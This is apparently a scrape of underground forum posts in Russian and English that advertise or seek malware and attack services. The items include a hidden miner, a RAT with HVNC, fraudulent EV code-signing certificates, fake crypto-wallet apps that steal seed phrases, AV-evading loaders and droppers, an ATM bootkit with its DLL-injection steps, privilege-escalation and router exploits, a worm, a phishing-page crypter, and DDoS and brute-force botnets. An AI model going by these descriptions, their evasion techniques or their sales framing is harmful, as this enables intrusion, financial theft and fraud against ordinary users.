направления при наличии хорошего HVNC и Стиллера и хорошего трафика?
И вашего опыта, с чего получается больше всего Профит и что в основе
зароботка, а что чисто для поддержки, оплаты расходников и передачи для
отработки третьим лицам?
Банки, вещевуха, пп, крипта итд?
Does anyone know where I can buy or rent Crocodile Botnet? I can't find the contact of any of its developers.
Есть опен сорц майнер, нужно криптануть его и сделать его работу скрытным.
Майнер имеет в себе набор из 20+ майнеров и автоматически анализирует какую
валюту и на каком пуле и на каком майнере в данный момент выгодней всего
майнить.
Почему я не хочу просто использывать Unam? Паблик, не обновляется, нет
автоматического анализа что выгодней майнить в данный момент.
Так же нужно добавить следующий функционал:
Стандартный:
Как во всех сайлент майнерах
привер: https://github.com/UnamSanctam/SilentETHMiner?tab=readme-ov-file
Не стандартный:
Добавить майнеры SSD/HDD
Сделать так что бы в диспетчере задач он показывал фейковые % нагрузки. Только
стандартный диспетчер другие вообще не важны.
Добавить майнер в MBR если это сейчас вообще мозжно что бы даже после
переустановки винды он сам ставился из памяти. Сори за мой 2010.
Цену вижу от 1500$.
There is an open sorc miner, we need to crypt it and make its work hidden. The
miner has a set of 20+ miners and automatically analyzes what currency and on
which pool and on which miner at the moment the most profitable to mine.
Why don't I just use Unam? Public, not updated, no automatic analysis of what
is the most profitable to mine at the moment.
Also need to add the following functionality:
Standard:
As in all silent miners
Commit: https://github.com/UnamSanctam/SilentETHMiner?tab=readme-ov-file
Injection (silent/hidden) - hiding the payload behind another process, for
example explorer.exe, conhost.exe, svchost.exe or other processes.
Idle Mining - can be configured to mine at different times or not mine at all
when the computer is being used or not being used.
Stealth - suspends the miner and clears the GPU memory while any programs in
the "Stealth Targets" option are open.
Watchdog - replaces the miner file if it is deleted and runs it if the
embedded miner is closed.
Remote Configuration - you can retrieve miner settings remotely from a URL
every 100 minutes.
Windows Defender Bypass - adds exceptions to Windows Defender for shared
folders used by the miner.
Process Killer - constantly checks for programs in "Destruction Targets" and
kills them if found.
Not standard:
Add SSD/HDD miners
Make it show fake load % in Task Manager. Only the standard task manager, the
others are not important at all.
Add a miner in MBR if it is now even possible that even after reinstallation
of the system it would be installed from memory. Sorry for my 2010.
I see the price from 1500$.
Spoiler: Telegram
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.cdn- telegram.org%2Ffile%2FKuDMMinxAazcMYaICh8N9JchdVFQxZtKvVpsklEyiTOxAGn1l_mGnZUb-4uh4vSa7qezr8N2AbMqwLbF0ymphhcFIfaJXPbq6qFlNvIaywflFZDCR163rKd7dDUVBzY55KNMlL6LrOqqMJruWSfoaFEFRPi67e2QFnxOSkfqSxssb1wP7IjK_E2OamkTlagjXbcDrigL6FPGDjkskoUnWn4tYh7DkvDCojNp1LkUysF_fMjx- _tSqiAqh3xmY73X6R1cOI9zpmu96j9S8RhTpg2Va0YS4miVpU1v4FjoGj1-Ai2Wmxoqtk1LRGalWigEJ- zZ1ovizgfF15HAZlIc1g.jpg&hash=8e005db914811074cbc2d79d68df924f&return_error=1)
You can contact @CODER_JQ right away.
t.me
or PM быстрый ответ.
We are now offering a round of preorders for Scruboxen RAT. Release price will be at least $250 more than preorder price.
What is Scruboxen?
Scruboxen isn't just any RAT. While it supplies you with most functions any RAT will come with, we also come with a stable HVNC, a built in UP TO DATE stealer, wallet stealing, remote anydesk, and more.
But how much more can we offer? Let me tell you. Scruboxen, like its predecessor Seroxen, will not only offer a full menu of features and be fully stable on release, it will also be -fully undetectable- at build time. Scruboxen will be ON ITS OWN SCRUBCRYPT STUB, totally separate from ScrubCrypt standalone.
You can preorder Scruboxen LIFETIME today for only $750.
We do not have an estimated release date. It will be released when its finished tested obfuscated kissed and cuddled. But we are giving you the opportunity to buy now and lock in for lifetime before we release at much higher price, and the price is subject to rise in the future.
Preorder now: https://scrubcrypt.su/products/Scruboxen-RAT-PREORDER-LIFETIME
Extended & Code Signing Certificates
Ensure your software is trusted everywhere with an EV Code Signing Certificate, issued by a reputable Certificate Authority (CA). These certificates provide a strong layer of security, allowing users to download your software with confidence, free from concerns about malware or warnings even raising the slightest suspicions.
Availability:
Immediate Stock: Available certificates ready for delivery. Fortune 500
Companies are available, although large Software/Cybersecurity F500's will
cost much more.
On Request: Custom orders fulfilled in 4-5 days.
Not resold or reused/recycled. Each certificate is sold for single-
person/single user, guaranteed fresh and unused, even if you are just getting
one file signed, it will not be done with a possible certificate that could
have just been burned.
Custom Org/Company/Business Name: These are the custom orders in which you can
choose your company name that will display on the certification, for example
on SafeNet or in file properties after signing. Custom specifications, but
please try and not be ridiculous, the more legitimate things sound/look, the
better for your cert-life....haha sorry, amazed at some of the company name
requests we get -_^
What is an EV Code Signing Certificate?
SmartScreen Bypass: Instantly bypasses SmartScreen filters without needing
reputation.
Trusted by UAC: Elevates your software's trust level with User Account Control
(UAC).
Kernel Driver Signing: Enables the signing of kernel-mode drivers, which is
essential for software that requires deep integration with the operating
system.
Enhanced User Trust: A signed application significantly boosts user
confidence, leading to higher conversion rates.
Antivirus Bypass: Helps evade detection by antivirus programs that rely on
signature-based scans.
Delivery Methods:
Custom orders / Fortune 500 Comp. / Other Registered LLC's --------> FIPS
140-2 Compliant Hardware Token
(USB Token that is very simple to use, if you are buying we are sure you know
all of this, but do not be afraid to ask, we will help everyone)
Frequently Asked Questions:
Validity: Certificates are valid for one year with renewal options available.
Availability: Usually in stock, but please confirm, and of course custom
orders are just that...custom, 4-5 days.
Price: $1500 - $3500
sign once: $150-350
CONTACT ON TOX PLEASE---->>
8F2DF33A3F7A813C158D0963A89C6CEEE0565B56945FE2D4854F99819D714D39BF1FA43100EE
OR OF COURSE ON XSS. Thank you.
Spoiler: Закрыто на депозит / closed on deposit: $150
**Escrow accepted
You can contact @Crypt_Crypt_Crypt right away.
t.me
**
Exploit topic: https://forum.exploit.in/topic/235856/
**Wallets including your package
Trust Wallet** (Browser ext. - Chrome, Mozilla)
Metamask (Browser ext. - Chrome, Mozilla)
Crypto.com (Browser ext.- Chrome, Mozilla)
Coinbase (Browser ext.- Chrome, Mozilla)
Phantom (Browser ext.- Chrome, Mozilla)
Martian (Browser ext.- Chrome, Mozilla)
Nami (Browser ext.- Chrome, Mozilla)
OKX (Browser ext.- Chrome, Mozilla)
Ronin (Browser ext.- Chrome, Mozilla)
-
Ledger (Desktop WIN)
Atomic Wallet (Desktop WIN)
Exodus (Desktop WIN)
Guarda (Desktop WIN)
Let's talk about how this project is going & what is the benefits from this
Extension and Desktop wallets
Project is kinda clear already since there's enough videos/images. I have made
wallets extension for Chrome/Mozilla for the most famous wallets. the
extensions is totally looks like legit, and if you are usually use the wallets
you will not going to figure out until your balance become $0. And I have
already linked the data to the telegram API, which is convenient for
everyone., extensions can be injected on victim browser simple by add it
straight and remove the original one. victim will not going to figure out
since it will be looks like the original one and in the same place for the
original extension with all original assets and logic, he will come one day
and try to login & maybe the same day and the credentials will be sent out to
your channel/user. so you can go straight and clear the funds simple or you
can even use the same device also to clear the fund as you wish..
About desktop wallets - I have developed applications and they are completely portable, all you have to do is find a way to inject the software into the device, and I think it is no big deal!, one day, maybe the same day, The victim will fall into the trap, it is exactly the same way Which browser extension wallets work, but this will be .exe and for desktop users, but keep in mind that you cannot use cold seeds (Mnemonic) in hot wallets for example. Trust wallets. Otherwise you are good with Atomic, Exodus, Guarda.
Each wallet has different logic and data/pages that can be sniffed. as you
know, I try to follow wallet after wallet with their same concept.
But mostly :-
- Password & Re-enter Password (To make sure if there's typo or different
password)
- Mnemonic(Seed) (12word / 15word / 18word / 21word / 24word)
- Backup file & Paste (Sent as a document)
- New Password additional in case you need to it.
Most wallets will give user there's error issues due connection etc. and something similar in case if he gets bored he can go straight to download the original one again.
and I think you'll be active enough to clear the funds before even he think what's going on!
Proof of syntax
Proof of folders and files/assets
Some of browser extension wallets.
Quote
Metamaskhttps://streamable.com/ymg0oa
Crypto.comhttps://streamable.com/8ww8md
Martian Wallet https://streamable.com/17692x
If you're asking for the rest, Please PM.Click to expand...
Some of desktop wallets.
Quote
Atomic Wallet https://streamable.com/lvyd62
Ledger Live https://streamable.com/8zhxcu
If you're asking for the rest, Please PM.Click to expand...
Currently
the version is (v1.0)
Pricing one-time for package: $2,500
Custom request and wallets through private message.
README:
I can help you to configure browser extension, build executables your apps.
I'd like to repeat, I prefer guarantee even you need to check the source-code
for cheat or backdoor (Accepted).
NOTE: All development is open-source. there's no backdoor or cheat at all.
NOTE: All wallets are easy to configure and edit API-TOKEN / CHAT-ID.
Spoiler: Закрыто на депозит. Closed for deposit.
Hello,
I offer a FUD advanced Cobalt Strike Artifact Kit & Reflection Loaders with customizable profiles for red teamers.
Key Features :
- Undetectable : Effective against most EDRs, XDRs, and AVs.
- Unique Versions : Each customer receives a unique version.
- Automatic Signing : All your beacons will be signed automatically.
- Smart Screen Bypass : No need to worry about smart screen
- Custom Certificates : Choose the certificate and the name of the
compiled PE to prepare it for you before sending.
- Polymorphic Reflection Loaders : Dynamically change to avoid detection.
- Anti-Debugging : Robust mechanisms to prevent debugging.
- Custom Built from Scratch : Ensures uniqueness and stealth.
- Custom Clang Compiler : Optimized for performance and evasion.
-Obfuscation : Adds an extra layer of security.
Additional Information :
- Costume profile
- Scan link:
https://kleenscan.com/scan_result/194bd19e6b31ebe18798e4fd327612cf7fb414d2f1a045572a0f88b5dad7e334
- In memory scan without URDL :
Contact : DM
Disclaimer : I am not responsible for any harmful activities conducted using this code. The buyer assumes all responsibility for its use.
Legal Notice : This software is intended for authorized security testing and research purposes only. The sale, distribution, or use of this software in any manner that violates any applicable law or regulation is strictly prohibited. The buyer assumes all legal responsibilities for its use.
I am looking for someone who can make a chrome/firefox extension that can steal the cookies of the user ( publishable on chrome extension store)
SmuzJect - лоадер/цмд-бот живущий в electron-приложениях.
Софт модульный, инжектор написан на С++, тело бота и модули на javascript.
Позволяет исполнять c дропом на диск РЕ32 и РЕ32+ на целевой windows-системе;
PE32+ в памяти, с использованием process hollowing техники. Также доступно
исполнение команд в windows shell(cmd.exe).
Бот:
- Вес билда ~300kB. Пожат upx;
- Общение с С2 по http(s);
- Почти все вызовы к С2 накрыты salsa20;
- Возможность закрепа в инжектируемом приложении.
Функционал панели:
- Список ботов;
- Группы;
- Планировщик заданий;
- Исполнение команд;
- Панель в торе.
Софт имеет геолок:
- ОДКБ(исключая АМ);
- BRICS(9 стран-участниц);
- Другие(HU, RS).
Полный список: AE, BR, BY, CN, EG, ET, HU, IN, IR, KG, KZ, RS, RU, TZ, ZA
**!!Для работы бота, на целевой системе должно быть запущено electron- приложение!!
Цена:** $700/мес. в xmr, по курсу на день совершения перевода.
Первая сделка с арендатором оформляется только через гаранта.
Началом аренды считается день передачи заказчику реквизитов доступа и билда.
1 месяц, это - число дня начала аренды по это же число следующего месяца.
Сервера и домен оплачивает заказчик.
Это, прокладка(1GB/$5-10) и хост(8GB/$30-40).
Стоимость домена варьируется от $3-5 до условной бесконечности.
Заказчику передаются инвойсы для самостоятельной оплаты криптой.
Список протестированых приложений:
- Atom;
- Atomic
- CRYPTO.com;
- Discord;
- Docker Desktop;
- GitHub Desktop;
- Ledger;
- MEXC;
- OKX;
- OpenVPN;
- Trello;
- Trezor.
**!!Не все приложения работают одинаково хорошо!!
На данный момент точно НЕ РАБОТАЕТ с:**
- Binance;
- Exodus;
- Figma Desktop;
- Mattermost;
- Obsidian;
- Teams.
Что вы получаете:
- Доступ к панеле;
- Билд;
- Краткий ЧаВО;
- Поддержку по вопросам связанным с использованием софта.
Чек* на scanner.to 26/09/24:
hXXps:[space]//scanner.to/result/uPTTak9KYSqS[
*Следует понимать, что билд хоть и боевой, отработал не полностью, т.к. на тестируемых системах не было запущено электро-приложений.
Демонстрационное видео с исполнением в памяти putty.exe находится в аттаче.
Всем привет ! Если вдруг создал тему не в той ветке, просьба перекинуть в нужную
Есть собственный ботнет из USA PC, закреп через VNC.
Работаю в команде. Отрабатываем USA банки, Криту, а так же Amazon и Ebay.
Работаем сейчас через достаточно кривой HVNC, а именно:
1)Не умеет в несколько мониторов.
2)Не пойми где мышка(иногда бывает так, что видишь курсор в одном месте, а
клик происходит в другом).
3)Показывает 1/8 монитора и нельзя отдалить/приблизить картинку.
4)Может просто зависнуть и быть не кликабельным, при повторной подгрузке
открывается тот же самый процесс, что и был закрыт.
5)Нет браузеров таких как Opera и Brave
Про детекты вообще молчу, в динамике может просто быть убит второсортными АВ.
Теперь к теме:
Ищу HVNC или HRDP(но который не создает второй профиль на устройстве, а
работает именно с того профиля на котором он был подгружен). Готов рассмотреть
любые варианты, но РАБОЧЕГО софта. Задача именно чтобы сама работа за софтом
была удобной и комфортной, а не с подвисанием или багами. По этой причине
паблик проекты которые представлены на форуме мне не подходят(Мое субъективное
мнение ибо перепробовал почти все).
Обязательные требования:
1)Работает от User прав
2)Не требует/вызывает запросы admin rights или Uaс
3)Нормальная работа курсора и кликов
Хорошо бы чтоб умел, но не обязательно:
1)Распознавать несколько мониторов
2)Возможность захода в приложения почт на компе thunderbird/outlook
3)Имел возможность захода не только в chrome и edge, а так же другие браузеры
4)Имел хоть какой-то закреп(Но не обязательно, повторюсь, у меня совой ботнет
и могу постоянно подгружать заново, если что-то слетит. Но главное, чтобы не
доходило до маразма и софт не слетал каждые 10 минут)
Рассмотрю коллаборации с другими командами у кого данный софт есть в
собственных приват решениях, либо кто может реализовать это под нас.
Не ищу продажу сердец, исходного кода или недописанных продуктов. Я не кодер,
а искать кодера под чужой софт который будет что-то допиливать/обслуживать при
каком либо обновлении - нет не времени, не желания.
Ищу именно готовое решение с какой-либо техподдержкой.
Ценой не обижу, готов как арендовать данный софт, так и платить % с отработки.
**!!!Приобретение либо через гаранта, либо по постоплате после теста на 2-3
компах из ботнета!!!
Крипты, сервера, сертификаты и прочее расходники - выдам. Если нужно что-то
конкретное и у этого нет репутации - то все входит в сумму сделки в гаранте.
**
Просьба не тратить не мое, не свое время на:
-А можно свами поработать ?
-А сети/корпы не продаете ?
-А я стим и ютуб покупаю, у тебя не завалялось ?
И так далее...
За любую помощь или рекомендации - буду благодарен.
Связь через ТГ: @akame_main
На форуме отвечаю долго, но можно и в лс форума )
Работает на всех моделях Wincor/Diebold ставим буткит, который перезаписывает
MBR/GPT для захвата загрузки ОС. Буткит закрепляется в системе, поэтому будет
работать даже после перезагрузки и обновлений. При перезагрузке буткит
выполняется с правами Ring-0, подгружая инжектор с привилегиями SYSTEM.
Инжектор находит нужный процесс, через CreateToolhelp32Snapshot и
Process32First/Process32Next. Потом выделяет память в процессе через
VirtualAllocEx, записывает туда путь к DLL с Write Process Memory и создает
удаленный поток с Create Remote Thread, чтобы через Load LibraryA загрузить
DLL. Это даёт выполнение кода в контексте процесса и полный контроль над
банкоматом.
В завершение инжектор запускает secure Delete, чтобы перезаписать и удалить
DLL, уменьшая шансы на палево. Кто лазил с подобными темами знает как и что
делать.
Контакт PM.
Цена 3к$, через гарант данного форума.
Продаю обфусцированный и уведенный от антивирусов эксплоит по получению
консоли с системными правами на основе CVE-2024-30088.
Протестировано на Windows Server 16/19 и Windows 10/11.
Sophos, ESET, McAfee, 360 не детектируют.
8 копий
**
Spreading methods** :
- Extension Spoofer Build (exe, bat, scr, docx, pdf)
- USB Drives
- Local Files (py, zip, exe, bat, jar, pdf, docx, xlsx, pptx, mp3, mp4, png)
- Cloud Drives (GoogleDrive, OneDrive, DropBox)
- Python Interpreter (Injects worm loader into all compiled python projects)
- Discord Spam (Sends your messages to all channels and friends)
- Telegram Spam (Sends your messages to all channels and friends)
- Spread on Local Network
Price
Def. Bypass Crypt : 15**$**
Worm Build : $30 ($15 for first 10)
Crypt + Worm build : $40
**Contact
@blackdataCFP (telegram)**
Исключительно для самообучения куплю приватные исходы С++/asm от шкаф***а
Прошу не пинать, паблик не предлагать, исключительно для самообучения.
Всех приветствую в этой теме, я являюсь разработчиком всякого вредоносного программного обеспечения. Недавно мной был написан MacOS стиллер, который я планирую открыть и разместить на форуме, но не имею желания размещать тему без соответствующего цене депозита. Поэтому я ищу заинтересованных людей в Mac OS стиллере, чтобы предложить им хорошие и выгодные условия. Сразу подмечу, что я не ищу инвесторов или людей с финансами, которые зальют за меня депозит и я буду им должен процент с продаж, я ищу людей, которые вложившись в мой проект будут иметь вечную подписку и постоянную поддержку
Для размещения стиллера на форуме мне необходимо ~4000$, с учетом того, что месячная подписка будет стоить 1000$. Мое предложение такое: я хочу продать пару лайфтайм слотов по 2000$ за каждый, взамен предоставив бессрочную подписку на свой продукт — Mac OS стиллер. Почему это выгодно? Вложив в мой проект на стартовой стадии развития вы можете как и мне с размещением и депозитом, так и получите удобный и практичный инструмент для работы на бессрочный срок
Принцип реализации схемы: вы создаете сделку через гаранта, я выдаю вам бессрочный доступ к своему продукту, после проверки вы подтверждаете сделку и все остаются довольными — вы с качественным продуктом, а я с реализованным ПО
Есть вопросы? Хотите узнать функционал? Есть свои идеи или предложения?
Пишите мне в телеграм, либо в ПМ: https://t.me/zerodebug
Good day,
Today I Introduce you my dropper which's execute through Windows registry in hidden and without any CMD screen or pop-up.
Details:-
1- Dropper execute inside all windows versions, 32bit or 64bit.
2- FUD Scantime Runtime 0/26/0/38/ 1-2/21
3- Size ~ 4.5Mb or smaller
4-Bypass WD & Cloud, ~%97 of Antivirus Software's.
5- Silent, no pop-up no CMD screen...
6- Bypass UAC (direct execution)
7- The Dropper can be linked to TG Bot and sends Instant notifications on
Execution, such as system IP/Country/Time/...more
Each builds will generate and encrypted uniquely by %100 difference.
Note: You must provide me direct link of your EXE
Prices:-
$120 Per Dropper
$500 per 1 week
Scans:-
https://avcheck.net/id/fne6m9CkjlAd
https://kleenscan.com/scan_result/0c62bf332113fc04a677484291b0116b4abd88d814b70b127adc3fd52f668711
TOX :
6F13AE7E4DBB39A9B2E028D62ACFDC3C8A2C12232DAB4785455457C1BBED350C023602CFB716
(Faster communication)
Jabber1:Darkmatter@jabb.im (slower
communication)
Jabber2 : Darkmatter1@thesecure.biz
(slower communication) please write me normally , because I face OTR
encryption issues in many cases!!
feel free to contact me if you have any question, Always welcome!
Имеется в наличии Shellcode loader использующий технику DLL sideloading,
который выполняет в памяти файлы EXE, DLL.
Обходит SmartScreen, т.к. использует легитимные подписанные файлы. Загрузку
необходимо производить в архиве.
Поддержка Native & .NET
Интересует сотрудничество в виде % от прибыли. От вас гостевой доступ в панель.
Видео пруфы:
Mimikatz vs Windows Defender + Cloud (Windows11 23H2)
Mimikatz vs Sophos EDR (Windows10)
[В НАЛИЧИИ] Лицензия Palo Alto CORTEX XDR PRO на 1 устройство на 1 год
Price - 3000$
Есть возможность приобретения других EDR решений: SentinelOne, CrowdStrike, Symantec, Bitdefender XDR... - по запросу. Сроки 2-3 недели.
1 лицензия в 1 руки!
DEL
2-10k
qtox
Hello! I'm introducing a botnet source that I have made over the past several months. This malware has its very own unique signature and is one of the best bots available for purchase at the moment. Completely advanced and carefully crafted it excels even the most known malware strains such as mirai variants, qbot, dosbot, mozi, and much more. This bot is capable of infecting pretty much virtually any device that runs on a Linux kernel. It has been tested all the way from Linux kernel 2.6 to 6.11 at the most recent.
Compiling Binaries:
A compiler was built in GoLang to download, extract, and build binaries automatically within less than a minute eliminating the need to compile everything manually or with complicated shell scripting. This means that you can make code changes, fresh rebuilds, and much more to easily build all of the binaries in a quick amount of time. The user seamlessly and can easily add binaries to the code simply by inputting a URL and a few new lines of code with the name of the file.
List of supported binaries at base code:
ArmV4L
ArmV5L
ArmV6L
ArmV7L
Intel i586
Intel i686
M86k
Mips
Mips64
Mipsel
SH4
x86_64 (Same as i786 and the higher variations, works with both Intel and all
AMD variations running 64 bit)
If the user wishes to add more binaries, they need a cross compiler built with uClibc.
CNC:
The CNC was coded in GoLang using the Tengo library to eliminate the need of having to rebuild CNC's when you can just update a Tengo script with real time changes to avoid rebuilds. The CNC is feature dense with it's very own safe database used for creating users on the CNC.
The CNC runs off both HTTP and SSH. This is to ensure encrypted communications amongst ISP's, VPN's, and overall communication sniffing to avoid being questioned on what your activities consist of.
Customizable communication for the CNC is also available per user demands, you can change ports of SSH, bot communication, and HTTP.
The malware itself communicates to the CNC using XOR key exchanges in multiple iterations typically involving 3-5 key exchanges to also avoid communication sniffing.
Bot Source/Malware:
The actual bot source code is made in C. It's very well organized which makes it easier to make modifications or to see where things are getting initialized. It's also very well coded so that there can never be a segmentation fault or any type of memory/resource issues.
Features:
Command execution and parsing.
Customized connection and packet sending.
Ability to stop sending attacks/packets initialized by a specific user. Every attack returns an ID. You can use this ID to stop an attack
Reverse Shell, allowing the users to execute commands on every device connected to the CNC. You can execute any command you want such as wget, pkill, curl, reboot, etc.
Shell, similar to the Reverse Shell except it executes in the context of the malware PID.
Shutting down devices, allowing the users to shutdown and kill all of the connected devices in the event of any compromise or law enforcement influence.
Updating bots automatically, allowing the users to automatically update every single connected device to receive an update after modifications were made to the malware. This eliminates the need to reload all of the devices manually.
Ability to set domain and IPv4 connections on the bot. This allows the users to use a domain which makes it possible to regain all of the connected devices simply by changing the IPv4 on the A Record. So if the actual CNC IPv4 gets ddos'd, banned, or seized you can easily get it back online. Domain is not required for the bot to function or connect to the CNC.
DNS Resolver, pretty self explanatory, resolved the DNS associated with the domain connections and so on.
Persistence to maintain connections in the event of a device reboot or PID kill. Persistence includes cron, initd, rcd, and systemd.
Watchdog, similar to persistence it watches if the PID dies and restarts it in any event it goes down.
Malware Killing, the bot has a pretty extensive method for killing and removing other malware or unwanted programs from the devices. This includes specific details about scanning binaries for certain data matches.
File Locking, the bot has a file locker which prohibits the use of creating certain binaries and files on the device, excluding our very own bot.
ESI, the bot has Ensure Single Instance to make sure the user never encounters any duplicated connections on the same device.
Attack Methods:
Using specialized Linux kernel coding we were able to achieve sending TCP packets without the need of root/admin privileges across a vast number of devices. This makes it so that even basic logins can send TCP packets.
Layer 3 Methods are customizable with specifying the time and size. There are no destination ports in Layer 3.
TCP Methods are customizable with specifying the destination port, time, and PPS.
UDP Methods are customizable with specifying the destination port, time, and size.
Layer 3 (ICMP, ICMP_Fragmentation, IPIP).
Layer 4 - TCP (Generic, Hold, Junk, OpenVPN, Socket).
Layer 4 - UDP (Generic, Bypass, Junk, OpenVPN).
Users can easily add more Attack Methods using the same structure in the code.
Contact Information:
Telegram: https://t.me/cyb3rph4nt0m
On-site DMS also available but may be slower for a response
Price: 1500$
ESCROW ACCEPTED AND ENCOURAGED FOR USE!
приветствую, подскажите, есть ли где у кого решение для блокировки\отключения ав? Во снах вижу это как exe файл, который всегда чистый и после запуска рубит антики.. Не все антики, мой список из 4 строк. Стучите в лс. Но прошу не предлагать продукт, который напишите с 0 специально для меня. Тут нужна проверка временем и опыт. Цены обсуждаю
Уязвимость позволяет выполнить произвольный код на роутере TOTOLINK EX1200L. Возникает из-за недостаточной валидации параметра langType в функции setLanguageCfg файла /cgi-bin/cstecgi.cgi. Эту уязвимость можно эксплуатировать через специально сформированные HTTP-запросы, что приводит к переполнению буфера и выполнению произвольного кода. Эксплойт также обходит защитные механизмы, такие как Stack Canary и DEP.
Эксплойт протестирован на версии прошивки 9.3.5u.6146_B20201023
Price: 20 k
Contact: pm, гарант данного форума
Ищу малварь которая даст удаленный доступ к смартфону , рассмотрю любые
реализации. Которая имеет мало мальский интерфейс криптокошелька с BTC / usdt
и чтобы возможно было нарисовать дистанционно любой баланс.
С меня - инсталлы. Работаю точечно.
Интересна работа под %
Вариант разработки рассмотрю по разумной цене
Доброго времени, посетители темы. В продаже исходный код нерезидентного лоадера с веб-панелью. Преимущество заключается в том, что ему не нужен крипт, по причине того, что билд на питоне. Перекомпилируйте билд и получите совершенно чистый файл, который не требует крипта и каких-либо вмешательств. Приблизительный размер скомпилированного билда ~9.5 мб (python)
Билд представлен в двух версиях: Python и C++ (обе версии исходного кода будут вручены покупателю, но основной рекомендуется использовать python по причине легкой чистки детектов и легкого метода уникализации и некой обфускации)
Spoiler: Скриншот панели / Panel screenshot
1. Лоадер не требует криптования, вы можете пересоздать билд и получите
абсолютно чистый .exe файл
2. Статистика запусков стучит на панель, а также в телеграм (через тот же php
файл, настраивается по желанию)
3. Уникализация каждого билда путем генерации треш-кода, переименовывания
методов и переменных
4. Нет рантайм детектов от Windows Defender, а также многих других
антивирусных обеспечений
Стоимость исходного кода составляет 400$, либо 600$ при продаже в одни руки (возможен торг)
Я предвкушаю сообщения в теме о том, что питон не для людей, но сразу обозначу один нюанс: какая разница какой язык программирования, если он также выполняет свой функционал, тем более еще и без детектов. Но истинным любителям нативных языков я выдам в комплекте билд, написанный на C++ (не стал использовать его как основной, потому что у покупателя будут проблемы с чисткой)
Spoiler: Детекты на Virustotal / Virustotal detects
Могу дописать что угодно, любой функционал, кроме обхода SmartScreen, его можно обойти выдавая билд в rar архиве. Алерты от гугла исправляются пампом файла, все легко и просто
Связаться со мной можно через личные сообщения на форуме, либо через телеграм — https://t.me/zerodebug (телеграмом пользуюсь редко, но буду стараться быть онлайн 24 часа в сутки)
Хотите купить? Можете сразу создавать сделку через гаранта и писать мне по контактам. Нужен Tox? Напишите мне в ПМ!
Уязвимые системы:
Windows 10/11
Windows Server 2016
Windows Server 2019
Windows Server 2022
Работает из Low
Эксплойт работает на последних патчах
Гарант приветствуется.
Цена 200к$, первый контакт ПМ
Spoiler: Закрыто на депозит. Внесите депозит 2000 $
Буду лаконичным.Данное поделие основано на российском аналоге тимвивер(а)
Безопасное управление компьютерами, устройствами, серверами. Бесплатная версия для компьютеров, смартфонов и планшетов. Линейка тарифов. Сертифицировано ФСТЭК.
![xn--80akicokc0aablc.xn--p1ai](/proxy.php?image=https%3A%2F%2Fxn-- 80akicokc0aablc.xn-- p1ai%2FContent%2FImages%2Ffavicon.svg&hash=bac9c6c76e7cdd6ebca9a8b128b5b9c0&return_error=1) xn--80akicokc0aablc.xn--p1ai
ассистент «Быстрый старт»,не уступающим по скорости с немецкой
программой.Функционал гораздо обширней,подробности на сайте
разработчика,cmd,файловый менеджер с возможностью запуска файлов,удаленное
управление и так далее.
Все окна визуально скрыты.Айди для соединения высылается в панель,пассворд для
подключения задается статичным.В отличии от оригинального,система не реагирует
на работу софта.К примеру ф аервол ,дрожание курсора.
Не вызывает уак,не оставляет логов,цифровые подписи сохранены.Так же имеет
несколько команд для выполнения из панели,одна из которых,это лоадер ехе
файлов.каждую команду можно задать,как одному,так и всем сразу.
Сборка поставляется в виде билда и набором файлов,где собрать можно будет
самостоятельно,по своему усмотрению.
Массовое распространение запрещено.
Едино разовая оплата в размере 500$,ребилд 30$,чистки от 30$.
Установка панели приводится,как вами самостоятельно,так и мной,но тогда
оплачиваете 70$.
Требования для работы панели:
PHP 5.x, MySQL 5.x, Apache 2.x
Оплачиваете криптой,фактически любой популярной.Предпочтение LTC XMR USDT TRX
**Перед покупкой возможен тест.
Скантайм такой:**
build exe
![avcheck.net](/proxy.php?image=https%3A%2F%2Favcheck.net%2Fimg%2Flogo- blue.png&hash=cee6508989b328cffbfe9596440db6c7&return_error=1) avcheck.net
dll
![avcheck.net](/proxy.php?image=https%3A%2F%2Favcheck.net%2Fimg%2Flogo- blue.png&hash=cee6508989b328cffbfe9596440db6c7&return_error=1) avcheck.net
Рантайм пока нет возможности,дефендер не палит,по крайней мере у меня.
EN
Hello guys!
I'm back again with another amazing highly relevant service/tool that solves a long-faced problem for some of you guys deploying HTML phishing pages to cloud storage. Introducing the Blov HTML Crypter, no more HTML file takedown when you deploy or host your HTML/HTM/XHTM/XHTML files. Advanced functionality includes CSS, HTML & JS minification, JS obfuscation, and HTML code encryption using a standard encryption algorithm such as AES, and many more.
Who needs this service?
1. For anyone who hosts an HTML/HTM/XHTML/XHTM file, the file is frequently
removed from the server due to virus detection.
2. For anyone who sends an HTML/HTM/XHTML/XHTM file to a recipient, and the
file is detected as a virus.
What is the cost of this service?
The cost of this service is $20 per encrypted file.
Feel free to contact me here or on Telegram @DmitriBlovvv
RU
Привет, ребята!
Я снова вернулся с очередным удивительным и очень актуальным сервисом/инструментом, который решает давнюю проблему некоторых из вас, размещающих фишинговые HTML-страницы в облачных хранилищах. Представляю вашему вниманию Blov HTML Crypter, больше не нужно вырывать HTML-файлы при развертывании или размещении ваших HTML/HTM/XHTM/XHTML файлов. Расширенный функционал включает минификацию CSS и HTML, обфускацию JS, шифрование HTML- кода с помощью стандартного алгоритма шифрования, такого как AES, и многое другое.
Кому нужна эта услуга?
1. Всем, кто размещает HTML/HTM/XHTML/XHTM-файлы, поскольку они часто
удаляются с сервера из-за обнаружения вирусов.
2. Всем, кто отправляет HTML/HTM/XHTML/XHTM-файл получателю, и этот файл
обнаруживается как вирус.
Какова стоимость этой услуги?
Стоимость этой услуги составляет 20 долларов за один зашифрованный файл.
Не стесняйтесь обращаться ко мне здесь или в Telegram @DmitriBlovvv
Hello dear forum users, today I wish to present to you my personal development of the last 7 months. It is the complete source code of a sophisticated modular botnet coded by me entirely in Rust, from the ground up.
Client/Bot
[+] Support for Windows and Linux, tested on x64/86 CPU architectures.
[+] Brute Module : RDP (CredSSP / SSL/TLS Only. No-NLA not supported), SSH,
VNC, FTP.
[+] Scan Module : RDP, SSH, VNC, FTP, SMTP, POP3, IMAP, MySQL.
[+] Mine Module : Silent XMRig dropper with config, nothing complicated.
[+] Clip Module : Advanced crypto address clipper with all different kinds of
addresses and cryptos (bc1q, 1, 3, bc1p, etc).
[+] Proxy Module : Reverse SOCKS5 proxy with randomized user + pass.
[+] Load Module : Download and execute file from direct link.
Server/C2
[+] Tor/Onion Option : Make bots connect to .onion - This allows you to move
the C2 software to any dedik and still have all your bots.
[+] Custom TCP communication protocol with cryptographic client authentication
(ed25519 + x25519, Diffie-Hellman Key Exchange, AES256 for communication
encryption).
[+] Web interface with advanced attack launching system and various statistics
[+] Console interface
[+] For RDP bruting, there is support for z668 reco list format
